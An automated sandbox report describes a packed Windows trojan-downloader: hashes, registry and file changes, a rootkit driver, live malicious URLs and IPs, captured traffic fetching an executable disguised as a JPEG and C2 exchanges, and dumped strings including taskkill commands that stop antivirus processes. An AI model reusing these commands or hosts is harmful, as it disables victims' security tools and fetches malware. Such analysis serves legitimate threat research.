Packed.Win32.Themida_5fbe412824

Packed.Win32.Themida.FD, Trojan-Downloader.Win32.Karagany.1.FD, Trojan-PSW.Win32.Bzub.2.FD, Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.Y...
Blog rating:1.7 out of5 with3 ratings

Packed.Win32.Themida_5fbe412824

by malwarelabrobot on September 29th, 2016 in Malware Descriptions.

Packed.Win32.Themida.FD, Trojan-Downloader.Win32.Karagany.1.FD, Trojan-PSW.Win32.Bzub.2.FD, Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, PackedThemida.YR, GenericInjector.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan, Worm, EmailWorm, Packed


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 5fbe412824a59a573d118d13a7a1ef57
SHA1: e2c52c132da795c364d932f0a277928b19dd9803
SHA256: 8f3563891f1eb7ca8c5d7cbde6528e7ff0dc81fcca11bf8cd660860a694c3e6b
SSDeep: 196608:oxx9hcbHDNSPFYmrweyW1bxPTQw1aBVg1I/fAKncxd52UiwQenwwmKE1:6hcTDYPLrwdqGugfPgD2UzwrK
Size: 12238848 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-09-11 18:41:36
Analyzed on: WindowsXP SP3 32-bit


Summary:

Packed. A packed file can be a compressed and/or encrypted in a manner that prevents matching the memory image of that file and the actual file on disk. Sometimes used for copy protection, packers are often used to make Spyware less easy to analyze/detect.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Packed creates the following process(es):
No processes have been created.
The Packed injects its code into the following process(es):

%original file name%.exe:1612

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1612 makes changes in the file system.
The Packed creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\user[1].htm (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\user[1].htm (380 bytes)
%WinDir%\qfx86.sys (188 bytes)
%Documents and Settings%\%current user%\Desktop\ÓÎÐÐ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

The Packed deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\user[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\user[1].htm (0 bytes)

Registry activity

The process %original file name%.exe:1612 makes changes in the system registry.
The Packed creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1916x902x32(BGR 0)" = "31,31,31,31"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 B4 AD 22 87 B0 11 18 69 10 4A 5F 9A 07 4F 42"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Packed modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Packed modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Packed modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Packed deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
93ea8d04ec73a85db02eb8805988f733 c:\WINDOWS\qfx86.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\%WinDir%\qfx86.sys" the Packed controls loading executable images into a memory by installing the Load image notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
4096 14766080 9818112 5.52117 0ef4bf2c80b4498d7504a253ee8aa031
.rsrc 14770176 35708 20480 5.08802 7d5fcce021a7c04348993be990c5e3fa
.idata 14807040 4096 4096 0.153156 b30d088ca268e069795e70f7a6082fb7
14811136 4055040 4096 0.029229 15ee9bbf38f95f7a37edd52c741efa08
tvtnwrsd 18866176 2383872 2383872 5.51636 ccdacbc00944c1f913eeab11d3698d46
wzjrzyzv 21250048 4096 4096 0.421445 5689a2a6fe1c2086ffb23e499492f3a4

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.yy171.com/x86.jpg 59.56.97.48
hxxp://qxw1001940641.my3w.com/ 121.42.134.98
hxxp://qxw1001940641.my3w.com/b/user.asp 121.42.134.98
hxxp://qxw1001940641.my3w.com/yx448.html 121.42.134.98
hxxp://www.yy171.com/cloud32.jpg 59.56.97.48
hxxp://tp.cq738.com/cloud32.jpg 59.56.97.48


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /yx448.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: qxw1001940641.my3w.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 11 Sep 2016 15:44:13 GMT
Accept-Ranges: bytes
ETag: "5846815843cd21:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2016 22:42:39 GMT
Content-Length: 400
#7_2-1*3-1*2-1*3-1*2-13*3-1*2-3*3-1*2-6*3-2*2-2_5-32_87fdddb09091e87f3
315f828438beb01_167483344028518316941661014946143001824016074160602968
0147001801231578158401639013600287641408012954155822780013640141903032
415290290401166230140270481305614630_1-32_4-1*1-1*5-1*4-1*1-1*4-1*2-1*
7-2*1-1*4-1*2-1*7-2*1-1*6-1*2-1*3-1*1-1*3-1*4-1*2-1*6-2*7-1*1-1*6-1*5-
1*1-1*5-1*3-1*1-1_71141baed57a6d65cebbd706bb200ae3HTTP/1.1 200 OK..Con
tent-Type: text/html..Last-Modified: Sun, 11 Sep 2016 15:44:13 GMT..Ac
cept-Ranges: bytes..ETag: "5846815843cd21:0"..Server: Microsoft-IIS/7.
5..X-Powered-By: ASP.NET..Date: Tue, 27 Sep 2016 22:42:39 GMT..Content
-Length: 400..#7_2-1*3-1*2-1*3-1*2-13*3-1*2-3*3-1*2-6*3-2*2-2_5-32_87f
dddb09091e87f3315f828438beb01_1674833440285183169416610149461430018240
1607416060296801470018012315781584016390136002876414080129541558227800
13640141903032415290290401166230140270481305614630_1-32_4-1*1-1*5-1*4-
1*1-1*4-1*2-1*7-2*1-1*4-1*2-1*7-2*1-1*6-1*2-1*3-1*1-1*3-1*4-1*2-1*6-2*
7-1*1-1*6-1*5-1*1-1*5-1*3-1*1-1_71141baed57a6d65cebbd706bb200ae3>....


POST /b/user.asp HTTP/1.1


Referer: hXXp://qxw1001940641.my3w.com/b/user.asp
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: qxw1001940641.my3w.com
Content-Length: 32
Cache-Control: no-cache
Cookie: ASPSESSIONIDQADDASTQ=HDHLJGHBCKFIGAKIHDKDKFHH

cmd=5&j=CQJS000C290DDD4A4095406E
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 362
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2016 22:42:40 GMT
0|2|VVV.yxbsq.com/list.asp?classid=6|............v5.0.................
.........|.............. ..............VVV.50sd.cn....................
................................v5.0..................XAudio2_7.dll...
.........................win10,14393..........|2ce16f27219c72c13f3f41f
5fe976161|b73ae570e1eb14ae2321bdb1f2c3cbbe|5537b75522ad45da253357b4f59
e2bbc|HTTP/1.1 200 OK..Cache-Control: private..Content-Length: 362..Co
ntent-Type: text/html..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NE
T..Date: Tue, 27 Sep 2016 22:42:40 GMT..0|2|VVV.yxbsq.com/list.asp?cla
ssid=6|............v5.0..........................|.............. .....
.........VVV.50sd.cn..................................................
..v5.0..................XAudio2_7.dll............................win10
,14393..........|2ce16f27219c72c13f3f41f5fe976161|b73ae570e1eb14ae2321
bdb1f2c3cbbe|5537b75522ad45da253357b4f59e2bbc|..



GET /x86.jpg HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.yy171.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 27 Sep 2016 22:37:45 GMT
Content-Length: 188416
Content-Type: image/jpeg
Content-Location: hXXp://VVV.yy171.com/x86.jpg
Last-Modified: Wed, 12 Sep 2012 04:53:08 GMT
Accept-Ranges: bytes
ETag: "688ccc80a290cd1:494a"
Server: Microsoft-IIS/6.0
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........:.D.[...[..
.[...#L..[...[...[...T...[...T...[...#\..[...#N..[..Rich.[............
..............PE..L.....PP............................................
................................s.....................................
......d...............................................................
....(y..@............................................text.............
.................. ..h.rdata..............................@..H.data...
............................@...INIT................................ .
...vmp0...............................`..h.vmp1...t...................
........`....reloc..............................@..B..................
.......................HTTP/1.1 200 OK..Date: Tue, 27 Sep 2016 22:37:4
5 GMT..Content-Length: 188416..Content-Type: image/jpeg..Content-Locat
ion: hXXp://VVV.yy171.com/x86.jpg..Last-Modified: Wed, 12 Sep 2012 04:
53:08 GMT..Accept-Ranges: bytes..ETag: "688ccc80a290cd1:494a"..Server:
 Microsoft-IIS/6.0..MZ......................@.........................
......................!..L.!This program cannot be run in DOS mode....
$........:.D.[...[...[...#L..[...[...[...T...[...T...[...#\..[...#N..[
..Rich.[..........................PE..L.....PP........................
....................................................s.................
..........................d...........................................
........................(y..@.....................................
<<< skipped >>>


GET / HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qxw1001940641.my3w.com
Connection: Keep-Alive




HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Sat, 18 Jun 2016 06:13:51 GMT
Accept-Ranges: bytes
ETag: "f031749528c9d11:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2016 22:42:36 GMT
Content-Length: 8355
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?".....|..>.......4.....7N..gZ
f...>....'y6..E.f.t..M.~...=.>....-............./......k......c.
.....|W..&..2[..}tY.W..n?J............f.e1....QZ,.....f...g.......6...
.Y...;.....j...w......w..Xv...fZ........{..?.............O........4...
*......!......A....7.-. 5.b...yU{.....7*...t^...}4m....j...V.E...'..u^
~.Q.^.y3.s"."...}4.s..! .u...eS\......upN.......j{..q.........k.: .Z..
....y..l..u^...D..|..u..4'fl.......f...rL.t^.V.2.n..t.M.F.......7.i...
.g.=.{.`.f....}.........4.BK..c.IV....t...~^L.....}................{..
.N...v....vv>J....u4.f.....:-f.A......Yq.N..!.....i......]....(d...
.U.e]]m....%......Ye.{.8S...v...........?]..%.........B..-.@DL.z*.,...
i.f%5*..E._S.D:........G..T,.................O........\......{./.....,
..~.&KZO.uMs.....w...._..K..t..&.I&..^.{....O....?.../...../..'j.../..
?.?....[.4!z~t._....T.........y...I..!........=..`y...w............'..
...._.U.P...w.0...=.....o..y._.|.1a.n..>.....Q../......l....M^.....
.t.l.K.*.....LCZ...o.6.^v......M.*"c.....?.7.F.=..].jI#./..?......../.
3...?.....65.........L..b.W......'.g...;.........~)......|.....7_<.
/.......?.}..?.?......O.....O.._....5.?_.~.-......{...........>....
................w.A.....H..._.W.g.._._.9....w......7=......7..........
.t..p\e..(.).....c..?.o........3...q..^w.)...p`......A..:..u.......7.i
p..0.>.@ ....#&...?$...........<.....f.....%R..O&&^.m(....X..=.W
2.....?.w.w.....~.................m|.#6.f....-.y.......?7.|.g..;.Y
<<< skipped >>>


GET /b/user.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: qxw1001940641.my3w.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQADDASTQ=HDHLJGHBCKFIGAKIHDKDKFHH; path=/
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2016 22:42:38 GMT
Content-Length: 140
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"...H..{.....L...~.......;.H....
HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/html..Cont
ent-Encoding: gzip..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..
Set-Cookie: ASPSESSIONIDQADDASTQ=HDHLJGHBCKFIGAKIHDKDKFHH; path=/..X-P
owered-By: ASP.NET..Date: Tue, 27 Sep 2016 22:42:38 GMT..Content-Lengt
h: 140...............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.
@......{....{....;.N'...?\fd.l..J...!....?~|.?"...H..{.....L...~......
.;.H........


POST /b/user.asp HTTP/1.1


Referer: hXXp://qxw1001940641.my3w.com/b/user.asp
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: qxw1001940641.my3w.com
Content-Length: 32
Cache-Control: no-cache
Cookie: ASPSESSIONIDQADDASTQ=HDHLJGHBCKFIGAKIHDKDKFHH

cmd=c&j=CQJS000C290DDD4A4095406E
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2016 22:42:39 GMT
ConnectionOkHTTP/1.1 200 OK..Cache-Control: private..Content-Length: 1
2..Content-Type: text/html..Server: Microsoft-IIS/7.5..X-Powered-By: A
SP.NET..Date: Tue, 27 Sep 2016 22:42:39 GMT..ConnectionOk..



GET /cloud32.jpg HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: tp.cq738.com
Connection: close


HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Sep 2016 22:38:01 GMT
Content-Length: 11572
Content-Type: image/jpeg
Content-Location: hXXp://tp.cq738.com/cloud32.jpg
Last-Modified: Mon, 19 Sep 2016 14:51:23 GMT
Accept-Ranges: bytes
ETag: "1d16734a8512d21:48aa"
Server: Microsoft-IIS/6.0
......JFIF.....`.`.....C................................... $.' ",#..(
7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222
222222222222222222222...........".....................................
.......................}........!1A..Qa."q.2....#B...R..$3br........%&
'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................
......................................................................
.............................w.......!1..AQ.aq."2...B.....#3R..br...$4
.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................
................................................................?.....
.6.%..o.i.;F.5......`.9..E.-..b.M..k).b.7.c8.u........G..7W.M..-.&I..a
._0d.F1W..M......... ....9..5..Z.....=V.....Uk..Zd....d{.]\ .<. [..
r..n...QHTTP/1.1 200 OK..Connection: close..Date: Tue, 27 Sep 2016 22:
38:01 GMT..Content-Length: 11572..Content-Type: image/jpeg..Content-Lo
cation: hXXp://tp.cq738.com/cloud32.jpg..Last-Modified: Mon, 19 Sep 20
16 14:51:23 GMT..Accept-Ranges: bytes..ETag: "1d16734a8512d21:48aa"..S
erver: Microsoft-IIS/6.0........JFIF.....`.`.....C....................
............... $.' ",#..(7),01444.'9=82<.342...C...........2!.!222
22222222222222222222222222222222222222222222222..........."...........
.................................................}........!1A..Qa."q.2
....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.
......................................................................
.......................................................w.......!1.
<<< skipped >>>


HEAD /cloud32.jpg HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: tp.cq738.com
Connection: close


HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Sep 2016 22:38:00 GMT
Content-Length: 11572
Content-Type: image/jpeg
Content-Location: hXXp://tp.cq738.com/cloud32.jpg
Last-Modified: Mon, 19 Sep 2016 14:51:23 GMT
Accept-Ranges: bytes
ETag: "1d16734a8512d21:48aa"
Server: Microsoft-IIS/6.0







The Packed connects to the servers at the folowing location(s):







%original file name%.exe_1612_rwx_00401000_00E15000:




(@Iz.hn
!.Ka<
$.BtV
l-n}/
t$(SSh
~%UVW
f9z.vk
u$SShe
kernel32.dll
user32.dll
wininet.dll
advapi32.dll
Winmm.dll
yx.dll
ntdll.dll
NTDLL.DLL
shell32.dll
kernel32.DLL
Kernel32.dll
atl.dll
shlwapi.dll
Shlwapi.dll
EnumWindows
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ExitWindowsEx
CreateWindowStationA
CloseWindowStation
GetAsyncKeyState
MsgWaitForMultipleObjects
ShellExecuteA
GetWindowsDirectoryA
{84A90340-1CE7-4C96-8FFC-FB0124DE9AD7}
{E5000198-4471-40e2-92BC-D0BA075BDBB2}
{0A47829F-FBB4-4442-AB25-69159D4CBAF6}
hXXp://wpa.qq.com/msgrd?v=3&uin=2991425581&site=qq&menu=yes
yxbsq.ini
uPassword
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXps://
hXXp://
SoundRecorder.exe
c:\windows\sysnative\SoundRecorder.exe
\taskmgr.exe
.rsrc
.idata
i1.Gp2
1%.nF
U&W..sFS
.pt3i
v$.lz
.uP-i
0<#4%D
Eg )%S
~..ym
b#%s_/
~?562`#5
Z.dEx!
7.QAf
.yL]GS
}V.gd
ajW.HO
.bQ[DY
comctl32.dll
X.huu
%UPJp
7.iD(
v.EIo%
WKeL%f
=.ub)
Q/m.ob
vh%5s
s[ÿ
Z}G3%s
_^][ZY%X
:ñ_
!.Aa3
-{P.Ei
%UV}R
.kXqFu
$#.Hb ;
6[2%d
M.nNr
t%d@'
vK
[x##%XF[
cMdk
Ef.tB)
^.Db%
I%ue`
Q%f#X
5i.tP
ñWnl
JN%s9
.RWE&
b%5UE
WEi%Uf
-t0R}
t(.WT
.tYG%xx
.ru?e
'`Q*Ø
.ZS ,U
vEG%u
.jv.P=
%2U9w
%5UlnX
0}V%d
z:\]X
ST/\o%u8
|e^%u
iee_.dk
.WSS>
k\B%d
-10}2
.vwI])gFk/)
:-d}*LL
1If%uz
%sqKF
.XQ@h
_y%1X
SER32.dl
%S8t5(f
00`0<&5*$
xY:OÀ$
%0U"F
`?%F?J
P.rT,
%F#?p|
]K&vh%u
.AIdhX
$%dph7
6.zt)
"%{%X<L
T.Jl}
.WLla
~l (R.rP
.atK]
Q.TIy
eM4 .qt
t_8@6%U,m/
(-%So
,.BTA
^Y.eQ
X`%uq
5w%XFq
|%F,(&
L%u7/
A$Ìcww
o..tw::<:@
%/460(':
468864/,
CCC.NNM
<assemblyIdentity version="1.0.0.0" name=".add"/>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
Gdi32.dll
User32.dll
Mpr.dll
Advapi32.dll
Shell32.dll
winmm.dll
taskkill /f /im kavsvc.exe
taskkill /f /im KVXP.kxp
taskkill /f /im Rav.exe
taskkill /f /im Ravmon.exe
taskkill /f /im Mcshield.exe
taskkill /f /im VsTskMgr.exe
SOFTWARE\360Safe\safemon\ExecAccess
taskkill /f /im 360tray.exe
.txt\
.inf\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
